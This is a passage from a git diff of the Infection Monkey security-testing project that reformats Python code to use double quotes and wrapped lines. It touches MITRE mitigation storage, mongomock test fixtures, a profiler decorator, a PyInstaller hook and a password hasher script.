dict(EXPECTED_DICT) # new mutable diff --git a/monkey/monkey_island/cc/setup.py b/monkey/monkey_island/cc/setup.py index 213a62e6b..a03c554be 100644 --- a/monkey/monkey_island/cc/setup.py +++ b/monkey/monkey_island/cc/setup.py @@ -19,7 +19,9 @@ def try_store_mitigations_on_mongo(): try: mongo.db.validate_collection(mitigation_collection_name) if mongo.db.attack_mitigations.count() == 0: - raise errors.OperationFailure("Mitigation collection empty. Try dropping the collection and running again") + raise errors.OperationFailure( + "Mitigation collection empty. Try dropping the collection and running again" + ) except errors.OperationFailure: try: mongo.db.create_collection(mitigation_collection_name) @@ -31,12 +33,19 @@ def try_store_mitigations_on_mongo(): def store_mitigations_on_mongo(): stix2_mitigations = MitreApiInterface.get_all_mitigations() - mongo_mitigations = AttackMitigations.dict_from_stix2_attack_patterns(MitreApiInterface.get_all_attack_techniques()) - mitigation_technique_relationships = MitreApiInterface.get_technique_and_mitigation_relationships() + mongo_mitigations = AttackMitigations.dict_from_stix2_attack_patterns( + MitreApiInterface.get_all_attack_techniques() + ) + mitigation_technique_relationships = ( + MitreApiInterface.get_technique_and_mitigation_relationships() + ) for relationship in mitigation_technique_relationships: - mongo_mitigations[relationship['target_ref']].add_mitigation(stix2_mitigations[relationship['source_ref']]) + mongo_mitigations[relationship["target_ref"]].add_mitigation( + stix2_mitigations[relationship["source_ref"]] + ) for relationship in mitigation_technique_relationships: - mongo_mitigations[relationship['target_ref']].\ - add_no_mitigations_info(stix2_mitigations[relationship['source_ref']]) + mongo_mitigations[relationship["target_ref"]].add_no_mitigations_info( + stix2_mitigations[relationship["source_ref"]] + ) for key, mongo_object in mongo_mitigations.items(): mongo_object.save() diff --git a/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py b/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py index 17c115079..c0bc1f1aa 100644 --- a/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py +++ b/monkey/monkey_island/cc/test_common/fixtures/fixture_enum.py @@ -1,2 +1,2 @@ class FixtureEnum: - USES_DATABASE = 'uses_database' + USES_DATABASE = "uses_database" diff --git a/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py b/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py index 8a49d0254..079c91fb7 100644 --- a/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py +++ b/monkey/monkey_island/cc/test_common/fixtures/mongomock_fixtures.py @@ -6,14 +6,14 @@ from monkey_island.cc.models.edge import Edge from monkey_island.cc.models.zero_trust.finding import Finding -@pytest.fixture(scope='session', autouse=True) +@pytest.fixture(scope="session", autouse=True) def change_to_mongo_mock(): # Make sure tests are working with mongomock mongoengine.disconnect() - mongoengine.connect('mongoenginetest', host='mongomock://localhost') + mongoengine.connect("mongoenginetest", host="mongomock://localhost") -@pytest.fixture(scope='function') +@pytest.fixture(scope="function") def uses_database(): _clean_edge_db() _clean_monkey_db() diff --git a/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py b/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py index 64642895e..41b641cc8 100644 --- a/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py +++ b/monkey/monkey_island/cc/test_common/profiling/profiler_decorator.py @@ -5,8 +5,7 @@ from cProfile import Profile PROFILER_LOG_DIR = "./profiler_logs/" -def profile(sort_args=['cumulative'], print_args=[100]): - +def profile(sort_args=["cumulative"], print_args=[100]): def decorator(fn): def inner(*args, **kwargs): result = None @@ -19,11 +18,13 @@ def profile(sort_args=['cumulative'], print_args=[100]): except os.error: pass filename = PROFILER_LOG_DIR + _get_filename_for_function(fn) - with open(filename, 'w') as stream: + with open(filename, "w") as stream: stats = pstats.Stats(profiler, stream=stream) stats.strip_dirs().sort_stats(*sort_args).print_stats(*print_args) return result + return inner + return decorator diff --git a/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py b/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py index 260d703d5..e5e7ecb5a 100644 --- a/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py +++ b/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py @@ -4,5 +4,5 @@ import os from PyInstaller.utils.hooks import get_module_file_attribute -stix2_dir = os.path.dirname(get_module_file_attribute('stix2')) -datas = [(stix2_dir, 'stix2')] +stix2_dir = os.path.dirname(get_module_file_attribute("stix2")) +datas = [(stix2_dir, "stix2")] diff --git a/monkey/monkey_island/scripts/island_password_hasher.py b/monkey/monkey_island/scripts/island_password_hasher.py index 61212e734..5330a322f 100644 --- a/monkey/monkey_island/scripts/island_password_hasher.py +++ b/monkey/monkey_island/scripts/island_password_hasher.py @@ -22,5 +22,5 @@ def main(): print(h.hexdigest()) -if __name__ == '__main__': +if __name__ == "__main__": main()